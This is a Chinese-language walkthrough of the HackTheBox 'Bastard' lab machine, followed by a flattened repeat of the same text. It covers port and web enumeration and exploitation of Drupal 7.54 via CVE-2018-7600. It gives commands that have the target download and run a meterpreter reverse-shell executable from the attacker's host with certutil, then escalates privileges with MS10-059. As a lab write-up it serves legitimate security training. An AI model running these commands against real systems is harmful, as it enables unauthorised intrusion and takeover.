HackTheBox:Bastard 记录
字数 977 2025-08-18 11:35:59

HackTheBox: Bastard 靶机渗透教学文档

0x00 环境准备

  • 靶机IP: 10.10.10.9
  • 攻击机IP: 10.10.16.4 (Kali Linux)
  • 网络连接: 通过HackTheBox提供的VPN代理连接

0x01 信息收集阶段

端口扫描

  1. TCP全端口扫描:

    sudo nmap --min-rate 10000 -p- 10.10.10.9
    

    发现开放端口: 80, 135, 49154

  2. UDP端口扫描:

    sudo nmap -sU --min-rate 10000 -p- 10.10.10.9
    

    (此靶机未发现可利用UDP服务)

  3. 详细服务扫描:

    sudo nmap -sT -sV -O -p80,135,49154 10.10.10.9
    

    确定80端口运行HTTP服务

  4. 漏洞脚本扫描:

    sudo nmap --script=vuln -p80,135,49154 10.10.10.9
    

Web信息收集

  1. Web技术识别:

    whatweb http://10.10.10.9
    

    识别出Drupal CMS

  2. 目录扫描:

    gobuster dir --url http://10.10.10.9/ -x txt,html,sql,zip,rar -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    

    可尝试手动检查/robots.txt等常见路径

  3. 版本识别:

    curl -s http://10.10.10.9/CHANGELOG.txt | grep -m2 ""
    

    确认Drupal版本为7.54

0x02 漏洞利用

Drupal RCE漏洞(CVE-2018-7600)

  1. 漏洞验证:

    • 使用公开的Drupal 7.x RCE漏洞利用脚本
    • 验证命令执行:
      python3 drupa7-CVE-2018-7600.py -c="wmic OS get OSArchitecture" http://10.10.10.9/
      
      确认系统架构为64位Windows
  2. 生成反弹shell:

    msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=10.10.16.4 LPORT=4444 -f exe >> l7.exe
    
  3. 设置HTTP服务传输payload:

    python3 -m http.server 80
    
  4. 靶机下载并执行payload:

    python3 drupa7-CVE-2018-7600.py -c="certutil.exe -urlcache -split -f http://10.10.16.4/l7.exe l7.exe" http://10.10.10.9/
    python3 drupa7-CVE-2018-7600.py -c="l7.exe" http://10.10.10.9/
    
  5. Metasploit监听:

    msfconsole
    use multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set LHOST 10.10.16.4
    set LPORT 4444
    run
    

0x03 权限提升

本地漏洞利用

  1. 自动漏洞建议:

    run post/multi/recon/local_exploit_suggester
    

    或手动尝试已知漏洞

  2. 使用MS10-059漏洞提权:

    • 下载漏洞利用程序:
      wget https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS10-059/MS10-059.exe
      
    • 上传至靶机(方法同上)
    • 执行提权操作
  3. 获取flag:

    • 用户flag: C:\Users\user\Desktop\user.txt
    • 系统flag: C:\Users\Administrator\Desktop\root.txt

关键点总结

  1. 信息收集要全面:

    • 不要忽略UDP扫描
    • Web技术识别和版本确认至关重要
  2. 漏洞利用注意事项:

    • Drupal 7.54存在多个RCE漏洞
    • 命令执行时要考虑Windows环境特性
    • 反弹shell路径要正确
  3. 权限提升技巧:

    • Windows系统常见提权漏洞MS10-059
    • 使用Metasploit的local_exploit_suggester模块辅助
  4. 问题解决:

    • 遇到php-curl错误可尝试: sudo apt-get install php-curl
    • 执行路径问题要注意当前工作目录

参考资源

  1. Drupal 7.x Module Services RCE
  2. MS10-059漏洞利用
  3. 完整Walkthrough
HackTheBox: Bastard 靶机渗透教学文档 0x00 环境准备 靶机IP : 10.10.10.9 攻击机IP : 10.10.16.4 (Kali Linux) 网络连接 : 通过HackTheBox提供的VPN代理连接 0x01 信息收集阶段 端口扫描 TCP全端口扫描 : 发现开放端口: 80, 135, 49154 UDP端口扫描 : (此靶机未发现可利用UDP服务) 详细服务扫描 : 确定80端口运行HTTP服务 漏洞脚本扫描 : Web信息收集 Web技术识别 : 识别出Drupal CMS 目录扫描 : 可尝试手动检查 /robots.txt 等常见路径 版本识别 : 确认Drupal版本为7.54 0x02 漏洞利用 Drupal RCE漏洞(CVE-2018-7600) 漏洞验证 : 使用公开的Drupal 7.x RCE漏洞利用脚本 验证命令执行: 确认系统架构为64位Windows 生成反弹shell : 设置HTTP服务传输payload : 靶机下载并执行payload : Metasploit监听 : 0x03 权限提升 本地漏洞利用 自动漏洞建议 : 或手动尝试已知漏洞 使用MS10-059漏洞提权 : 下载漏洞利用程序: 上传至靶机(方法同上) 执行提权操作 获取flag : 用户flag: C:\Users\user\Desktop\user.txt 系统flag: C:\Users\Administrator\Desktop\root.txt 关键点总结 信息收集要全面 : 不要忽略UDP扫描 Web技术识别和版本确认至关重要 漏洞利用注意事项 : Drupal 7.54存在多个RCE漏洞 命令执行时要考虑Windows环境特性 反弹shell路径要正确 权限提升技巧 : Windows系统常见提权漏洞MS10-059 使用Metasploit的local_ exploit_ suggester模块辅助 问题解决 : 遇到php-curl错误可尝试: sudo apt-get install php-curl 执行路径问题要注意当前工作目录 参考资源 Drupal 7.x Module Services RCE MS10-059漏洞利用 完整Walkthrough